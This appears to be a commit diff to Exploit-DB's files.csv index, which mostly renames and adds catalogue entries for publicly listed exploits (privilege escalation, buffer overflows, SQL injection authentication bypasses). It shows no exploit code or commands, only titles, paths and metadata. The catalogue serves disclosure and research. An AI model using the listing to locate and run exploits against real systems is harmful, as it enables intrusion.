DB: 2017-01-13
13 new exploits SeaMonkey 1.1.14 - (marquee) Denial of Service SeaMonkey 1.1.14 - Denial of Service Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1) SapLPD 7.40 - Denial of Service CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2) Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2) aSc Timetables 2017 - Buffer Overflow Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout) Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout) PlaySMS 0.7 - SQL Injection PlaySms 0.7 - SQL Injection SAP SAPLPD 6.28 - Buffer Overflow (Metasploit) SapLPD 6.28 - Buffer Overflow (Metasploit) Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090) phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection) phpMyFamily 1.4.0 - Authentication Bypass ACNews 1.0 - Admin Authentication Bypass (SQL Injection) ACNews 1.0 - Authentication Bypass ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection ASPThai.Net Guestbook 5.5 - Authentication Bypass PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion WSN Guest 1.21 - (comments.php id) SQL Injection WSN Guest 1.21 - 'id' Parameter SQL Injection PNPHPBB2 <= 1.2 - (index.php c) SQL Injection PNPHPBB2 <= 1.2 - 'index.php' SQL Injection PNPHPBB2 <= 1.2i - viewforum.php SQL Injection PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion webClassifieds 2005 - (Authentication Bypass) SQL Injection webClassifieds 2005 - Authentication Bypass webSPELL 4.01.02 - 'id' Remote Edit Topics PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion WSN Guest 1.23 - 'Search' SQL Injection webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion WSN Guest 1.23 - 'Search' Parameter SQL Injection Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection Ayemsis Emlak Pro - Authentication Bypass Joomla! Component com_phocadocumentation - 'id' SQL Injection phpauctionsystem - Cross-Site Scripting / SQL Injection Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection PHPAuctionSystem - Cross-Site Scripting / SQL Injection RiotPix 0.61 - (forumid) Blind SQL Injection RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection RiotPix 0.61 - (Authentication Bypass) SQL Injection RiotPix 0.61 - Authentication Bypass playSms 0.9.3 - Multiple Remote / Local File Inclusion BlogHelper - 'common_db.inc' Remote Config File Disclosure PollHelper - 'poll.inc' Remote Config File Disclosure PlaySms 0.9.3 - Multiple Remote / Local File Inclusion BlogHelper - Remote Config File Disclosure PollHelper - Remote Config File Disclosure Fast FAQs System - (Authentication Bypass) SQL Injection Fast FAQs System - Authentication Bypass Fast Guest Book - (Authentication Bypass) SQL Injection Fast Guest Book - Authentication Bypass BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection BKWorks ProPHP 0.50b1 - Authentication Bypass Weight Loss Recipe Book 3.1 - Authentication Bypass Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection Dark Age CMS 0.2c Beta - Authentication Bypass Syzygy CMS 0.3 - Authentication Bypass eFAQ - (Authentication Bypass) SQL Injection eReservations - (Authentication Bypass) SQL Injection The Walking Club - (Authentication Bypass) SQL Injection Ping IP - (Authentication Bypass) SQL Injection eFAQ - Authentication Bypass eReservations - Authentication Bypass The Walking Club - Authentication Bypass Ping IP - Authentication Bypass ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection ASP ActionCalendar 1.3 - Authentication Bypass Click&Email - (Authentication Bypass) SQL Injection Click&Email - Authentication Bypass Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection Web-Calendar Lite 1.0 - Authentication Bypass ClickAuction - (Authentication Bypass) SQL Injection ClickAuction - Authentication Bypass Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection Netartmedia Car Portal 1.0 - Authentication Bypass SalesCart - (Authentication Bypass) SQL Injection SalesCart - Authentication Bypass WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection WholeHogSoftware Ware Support - Authentication Bypass WholeHogSoftware Password Protect - Authentication Bypass ClickCart 6.0 - (Authentication Bypass) SQL Injection ClickCart 6.0 - Authentication Bypass Online Grades 3.2.4 - (Authentication Bypass) SQL Injection Online Grades 3.2.4 - Authentication Bypass MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection MyDesing Sayac 2.0 - Authentication Bypass AuthPhp 1.0 - (Authentication Bypass) SQL Injection Mynews 0_10 - (Authentication Bypass) SQL Injection BlueBird Pre-Release - (Authentication Bypass) SQL Injection AuthPhp 1.0 - Authentication Bypass Mynews 0_10 - Authentication Bypass BlueBird Pre-Release - Authentication Bypass Grestul 1.x - Authentication Bypass (via Cookie SQL Injection) Grestul 1.x - Authentication Bypass (Cookie SQL Injection) XGuestBook 2.0 - (Authentication Bypass) SQL Injection XGuestBook 2.0 - Authentication Bypass PenPal 2.0 - (Authentication Bypass) SQL Injection PenPal 2.0 - Authentication Bypass BannerManager 0.81 - (Authentication Bypass) SQL Injection BannerManager 0.81 - Authentication Bypass Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection Free PHP Petition Signing Script - Authentication Bypass Simbas CMS 2.0 - (Authentication Bypass) SQL Injection WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection Simbas CMS 2.0 - Authentication Bypass WebFileExplorer 3.1 - Authentication Bypass My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection My Dealer CMS 2.0 - Authentication Bypass XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection NetHoteles 2.0/3.0 - Authentication Bypass Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection Tiny Blogr 1.0.0 rc4 - Authentication Bypass ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection ClanTiger 1.1.1 - Authentication Bypass Hot Project 7.0 - (Authentication Bypass) SQL Injection Hot Project 7.0 - Authentication Bypass EZ Webitor - (Authentication Bypass) SQL Injection EZ Webitor - Authentication Bypass Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection Creasito E-Commerce 1.3.16 - Authentication Bypass I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection I-Rater Pro/Plantinum 4.0 - Authentication Bypass 5 star Rating 1.2 - (Authentication Bypass) SQL Injection 5 star Rating 1.2 - Authentication Bypass Tiger Dms - (Authentication Bypass) SQL Injection Tiger Dms - Authentication Bypass The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup Realty Web-Base 1.0 - Authentication Bypass Luxbum 0.5.5/stable - Authentication Bypass My Game Script 2.0 - (Authentication Bypass) SQL Injection My Game Script 2.0 - Authentication Bypass Submitter Script - (Authentication Bypass) SQL Injection Submitter Script - Authentication Bypass PHP Dir Submit - (Authentication Bypass) SQL Injection PHP Dir Submit - Authentication Bypass DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection DM FileManager 3.9.2 - Authentication Bypass VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection VICIDIAL 2.0.5-173 - Authentication Bypass Article Directory - (Authentication Bypass) SQL Injection Article Directory - Authentication Bypass phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection phpBugTracker 1.0.3 - Authentication Bypass Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection Zen Help Desk 2.1 - Authentication Bypass EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection EgyPlus 7ml 1.0.1 - Authentication Bypass Pixelactivo 3.0 - (Authentication Bypass) SQL Injection Pixelactivo 3.0 - Authentication Bypass MyCars Automotive - (Authentication Bypass) SQL Injection MyCars Automotive - Authentication Bypass Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection Zip Store Chat 4.0/5.0 - Authentication Bypass AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection AlumniServer 1.0.1 - Authentication Bypass ForumPal FE 1.1 - (Authentication Bypass) SQL Injection ForumPal FE 1.1 - Authentication Bypass Opial 1.0 - (Authentication Bypass) SQL Injection Opial 1.0 - Authentication Bypass webLeague 2.2.0 - (Authentication Bypass) SQL Injection webLeague 2.2.0 - Authentication Bypass AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection AnotherPHPBook (APB) 1.3.0 - Authentication Bypass SaphpLesson 4.0 - (Authentication Bypass) SQL Injection SaphpLesson 4.0 - Authentication Bypass Limny 1.01 - (Authentication Bypass) SQL Injection Limny 1.01 - Authentication Bypass Magician Blog 1.0 - (Authentication Bypass) SQL Injection Magician Blog 1.0 - Authentication Bypass AW BannerAd - (Authentication Bypass) SQL Injection AW BannerAd - Authentication Bypass Ajax Short URL Script - (Authentication Bypass) SQL Injection Ajax Short URL Script - Authentication Bypass TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection TT Web Site Manager 0.5 - Authentication Bypass SimpleLoginSys 0.5 - Authentication Bypass Questions Answered 1.3 - (Authentication Bypass) SQL Injection Questions Answered 1.3 - Authentication Bypass Blink Blog System - (Authentication Bypass) SQL Injection Blink Blog System - Authentication Bypass MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection MOC Designs PHP News 1.1 - Authentication Bypass PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection PHotoLa Gallery 1.0 - Authentication Bypass PHPCityPortal - (Authentication Bypass) SQL Injection PHPCityPortal - Authentication Bypass Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection Logoshows BBS 2.0 - Authentication Bypass SmilieScript 1.0 - (Authentication Bypass) SQL Injection SmilieScript 1.0 - Authentication Bypass humanCMS - (Authentication Bypass) SQL Injection humanCMS - Authentication Bypass Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection Three Pillars Help Desk 3.0 - Authentication Bypass AdsDX 3.05 - (Authentication Bypass) SQL Injection AdsDX 3.05 - Authentication Bypass Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection Nephp Publisher Enterprise 4.5 - Authentication Bypass W3infotech - (Authentication Bypass) SQL Injection W3infotech - Authentication Bypass Real Estate Portal X.0 - (Authentication Bypass) SQL Injection Real Estate Portal X.0 - Authentication Bypass PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection) PHP Inventory 1.2 - Authentication Bypass SitePal 1.1 - (Authentication Bypass) SQL Injection SitePal 1.1 - Authentication Bypass JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection JM CMS 1.0 - Authentication Bypass Pre Hospital Management System - (Authentication Bypass) SQL Injection Pre Hospital Management System - Authentication Bypass Digiappz Freekot - (Authentication Bypass) SQL Injection Digiappz Freekot - Authentication Bypass Omnistar Affiliate - (Authentication Bypass) SQL Injection Omnistar Affiliate - Authentication Bypass PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection Advance Biz Limited 1.0 - Authentication Bypass e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection e-topbiz banner exchange PHP - Authentication Bypass e-topbiz Slide Popups 1 PHP - Authentication Bypass Freewebscript'z Games - (Authentication Bypass) SQL Injection Freewebscript'z Games - Authentication Bypass DZOIC Handshakes - Authentication Bypass (SQL Injection) DZOIC Handshakes - Authentication Bypass DZOIC ClipHouse - Authentication Bypass (SQL Injection) DZOIC ClipHouse - Authentication Bypass PHP Car Rental-Script - (Authentication Bypass) SQL Injection PHP Car Rental-Script - Authentication Bypass Zen Tracking 2.2 - (Authentication Bypass) SQL Injection Baal Systems 3.8 - (Authentication Bypass) SQL Injection Zen Tracking 2.2 - Authentication Bypass Baal Systems 3.8 - Authentication Bypass Killmonster 2.1 - (Authentication Bypass) SQL Injection Killmonster 2.1 - Authentication Bypass Rostermain 1.1 - (Authentication Bypass) SQL Injection Rostermain 1.1 - Authentication Bypass NewsLetter Tailor - (Authentication Bypass) SQL Injection NewsLetter Tailor - Authentication Bypass WSN Guest 1.02 - (orderlinks) SQL Injection WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection Project Man 1.0 - (Authentication Bypass) SQL Injection Project Man 1.0 - Authentication Bypass Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection Uiga Fan Club 1.0 - Authentication Bypass HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection HazelPress Lite 0.0.4 - Authentication Bypass Majoda CMS - (Authentication Bypass) SQL Injection Majoda CMS - Authentication Bypass 4x CMS r26 - (Authentication Bypass) SQL Injection 4x CMS r26 - Authentication Bypass Satellite-X 4.0 - (Authentication Bypass) SQL Injection Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection Satellite-X 4.0 - Authentication Bypass Huron CMS 8 11 2007 - Authentication Bypass Zyke CMS 1.1 - (Authentication Bypass) SQL Injection Zyke CMS 1.1 - Authentication Bypass Online University - (Authentication Bypass) SQL Injection Online University - Authentication Bypass Online Job Board - (Authentication Bypass) SQL Injection Online Job Board - Authentication Bypass JE CMS 1.0.0 - Authentication Bypass (via SQL Injection) JE CMS 1.0.0 - Authentication Bypass ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection) SN News 1.2 - '/admin/loger.php' Authentication Bypass RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection RTTucson Quotations Database Script - Authentication Bypass PlaySms - 'index.php' Cross-Site Scripting PlaySms 0.8 - 'index.php' Cross-Site Scripting Practico CMS 13.7 - Authentication Bypass (SQL Injection) Practico CMS 13.7 - Authentication Bypass Airbnb Clone Script - Arbitrary File Upload Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection Milw0rm Clone Script 1.0 - Authentication Bypass PHPCollab CMS 2.5 - (emailusers.php) SQL Injection PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection My link trader 1.1 - 'id' Parameter SQL Injection My Link Trader 1.1 - 'id' Parameter SQL Injection b2evolution 6.8.2 - Arbitrary File Upload Job Portal Script 9.11 - Authentication Bypass Online Food Delivery 2.04 - Authentication Bypass iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection D-Link DIR-615 - Multiple Vulnerabilities School Management Software 2.75 - SQL Injection Penny Auction Script - Arbitrary File Upload ECommerce-TIBSECART - Arbitrary File Upload ECommerce-Multi-Vendor Software - Arbitrary File Upload
This commit is contained in:
Offensive Security
parent
3617e005f6
commit
a0c8330781
16 changed files with 751 additions and 156 deletions
313
files.csv
313
files.csv
|
|
@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port
|
|||
7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
|
||||
7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
|
||||
7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
|
||||
7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
|
||||
7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0
|
||||
7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
|
||||
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
|
||||
7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
|
||||
|
|
@ -5335,10 +5335,11 @@ id,file,description,date,author,platform,type,port
|
|||
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
|
||||
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
|
||||
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
|
||||
41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
|
||||
41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,multiple,dos,0
|
||||
41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
|
||||
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
|
||||
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
|
||||
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
|
@ -5967,7 +5968,7 @@ id,file,description,date,author,platform,type,port
|
|||
7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0
|
||||
7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0
|
||||
7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow",2009-01-07,send9,windows,local,0
|
||||
7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
|
||||
7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
|
||||
7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0
|
||||
7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0
|
||||
7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow",2009-01-08,Cnaph,windows,local,0
|
||||
|
|
@ -6501,7 +6502,7 @@ id,file,description,date,author,platform,type,port
|
|||
14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local,0
|
||||
14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0
|
||||
14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
|
||||
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
|
||||
14651,platforms/windows/local/14651.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
|
||||
14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",windows,local,0
|
||||
14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",windows,local,0
|
||||
14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",windows,local,0
|
||||
|
|
@ -7369,6 +7370,7 @@ id,file,description,date,author,platform,type,port
|
|||
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
|
||||
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
|
||||
20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0
|
||||
41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0
|
||||
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
|
||||
20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
|
||||
20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0
|
||||
|
|
@ -8060,7 +8062,7 @@ id,file,description,date,author,platform,type,port
|
|||
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
|
||||
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
|
||||
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
|
||||
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
|
||||
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
|
||||
29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
|
||||
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
|
||||
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
|
||||
|
|
@ -8750,7 +8752,7 @@ id,file,description,date,author,platform,type,port
|
|||
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
|
||||
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
|
||||
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
|
||||
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
|
||||
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
|
||||
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
|
|
@ -8928,7 +8930,7 @@ id,file,description,date,author,platform,type,port
|
|||
398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873
|
||||
399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873
|
||||
400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0
|
||||
404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
|
||||
404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
|
||||
405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
|
||||
408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
|
||||
409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
|
||||
|
|
@ -10519,7 +10521,7 @@ id,file,description,date,author,platform,type,port
|
|||
16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
|
||||
16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0
|
||||
16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||
16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16338,platforms/windows/remote/16338.rb,"SapLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16339,platforms/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
16340,platforms/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
|
|
@ -11782,6 +11784,7 @@ id,file,description,date,author,platform,type,port
|
|||
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
|
||||
20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
|
||||
20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
|
||||
20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0
|
||||
20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0
|
||||
20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0
|
||||
